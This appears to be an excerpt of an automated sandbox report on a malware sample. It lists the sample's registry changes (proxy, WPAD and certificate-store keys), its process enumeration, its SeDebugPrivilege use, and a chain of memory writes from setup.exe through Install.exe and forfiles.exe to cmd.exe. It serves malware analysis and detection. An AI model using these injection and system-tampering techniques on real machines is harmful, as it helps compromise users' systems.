Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionTime = 70ba22d21034db01 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDetectedUrl C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionTime = 30d275d41034db01 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1703934C-BB3D-4660-A426-7C1A9ECA713B} C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1703934C-BB3D-4660-A426-7C1A9ECA713B}\3e-37-ac-c9-90-6b C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionReason = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDecisionTime = 30d275d41034db01 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-37-ac-c9-90-6b\WpadDetectedUrl C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 1804 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2160 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2732 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
